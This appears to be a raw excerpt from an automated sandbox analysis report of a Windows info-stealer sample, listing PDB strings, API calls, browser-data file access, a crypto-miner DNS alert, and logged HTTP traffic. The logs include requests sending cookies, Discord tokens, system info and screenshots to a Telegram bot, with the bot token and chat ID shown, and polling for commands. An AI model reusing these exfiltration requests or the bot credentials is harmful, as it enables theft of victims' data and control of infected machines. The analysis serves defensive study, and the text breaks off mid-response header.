Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: based.exe, 00000008.00000002.2140120247.00007FFE11EBC000.00000040.00000001.01000000.00000015.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942410950.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1931053908.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\bin\2015\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000002.1999999146.0000025EB80B9000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000009.00000002.1905399144.00007FFDFB9AF000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: based.exe, 00000008.00000002.2140404120.00007FFE130C1000.00000040.00000001.01000000.0000001F.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1933749941.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1930774144.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942989444.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: based.exe, 00000008.00000002.2138737753.00007FFE0EB41000.00000040.00000001.01000000.00000017.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1935780231.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: svchost.exe, 00000016.00000003.1935382253.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python3.pdb source: svchost.exe, 00000016.00000003.1958528101.000002C3F582E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: based.exe, based.exe, 00000008.00000002.2137558702.00007FFE007E4000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\bin\2015\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed5microsoft.win32.primitivesccostura.microsoft.win32.primitives.dll.compressed source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1941897050.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: based.exe, based.exe, 00000008.00000002.2138314903.00007FFE0E151000.00000040.00000001.01000000.0000001B.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1946961098.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF6CEB38670
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB28D00 FindFirstFileExW,FindClose,	0_2_00007FF6CEB28D00
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF6CEB38670
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB426C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6CEB426C4
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_0036C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	5_2_0036C4A8
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_0037E560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	5_2_0037E560
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647787F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	6_2_00007FF647787F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647787F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	6_2_00007FF647787F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647791FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	6_2_00007FF647791FE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647778B00 FindFirstFileExW,FindClose,	6_2_00007FF647778B00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB88DCE0 FindFirstFileExW,	7_2_00000235BB88DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	7_2_00007FF7DFD38670
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD28D00 FindFirstFileExW,FindClose,	7_2_00007FF7DFD28D00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	7_2_00007FF7DFD38670
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD426C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	7_2_00007FF7DFD426C4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB8874DCE0 FindFirstFileExW,	8_2_000001EB8874DCE0

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.4:61625 -> 1.1.1.1:53

System process connects to network (likely due to code injection or exploit)

Source: C:\ProgramData\svchost.exe	Network Connect: 216.58.212.132 80
Source: C:\ProgramData\svchost.exe	Network Connect: 185.199.109.133 443

Queries Google from non browser process on port 80

Source: C:\ProgramData\svchost.exe	HTTP traffic: GET / HTTP/1.1 Host: www.google.com User-Agent: python-requests/2.28.1 Accept-Encoding: gzip, deflate, br Accept: / Connection: keep-alive
Source:	HTTP traffic: GET / HTTP/1.1 Host: www.google.com User-Agent: python-requests/2.28.1 Accept-Encoding: gzip, deflate, br Accept: / Connection: keep-alive
Source:	HTTP traffic: GET / HTTP/1.1 Host: www.google.com User-Agent: python-requests/2.28.1 Accept-Encoding: gzip, deflate, br Accept: / Connection: keep-alive

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendDocument?chat_id=6024388590&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(3.27%20kb) HTTP/1.1Content-Type: multipart/form-data; boundary="463d8e90-76b1-4e7d-9810-9ea4ed1571fc"Host: api.telegram.orgContent-Length: 2109Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%F0%9F%92%8EDiscord%20tokens:%0A HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%0A%F0%9F%96%A5Computer%20info:%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AComputer%20name:%20992547%0AUser%20name:%20user%0ASystem%20time:%202024-06-04%209:56:51%20pm%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20ON2Z3HY%0ARAM:%204095%20MB%0AHWID:%20E63B102745%0A%0A%F0%9F%9B%A1Security:%0AInstalled%20antivirus:%20Windows%20Defender.%0AStarted%20as%20admin:%20True HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: POST /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendDocument?chat_id=6024388590&caption=%F0%9F%93%B8Screenshot%20taken HTTP/1.1Content-Type: multipart/form-data; boundary="7e50d2cf-ee1f-4ae5-9e38-65693b30e2eb"Host: api.telegram.orgContent-Length: 128871Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%206476%0A%E2%84%B9%EF%B8%8FSend%20%22/6476*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%205169%0A%E2%84%B9%EF%B8%8FSend%20%22/5169*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 185.199.109.133 185.199.109.133

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: FASTLYUS FASTLYUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Jun 2024 01:56:40 GMTExpires: -1Cache-Control: private, max-age=0Content-Type: text/html; charset=ISO-8859-1Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-aiQhgy_sbOHoc9zCQcchNA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hpP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Encoding: gzipServer: gwsContent-Length: 8471X-XSS-Protection: 0X-Frame-Options: SAMEORIGINSet-Cookie: 1P_JAR=2024-06-05-01; expires=Fri, 05-Jul-2024 01:56:40 GMT; path=/; domain=.google.com; SecureSet-Cookie: AEC=AQTF6Hzc44E2muI_JCMTesoFs_XrQMBQ4j4mMnT3QfBhwhghiDa3ob9UOeY; expires=Mon, 02-Dec-2024 01:56:40 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=laxSet-Cookie: 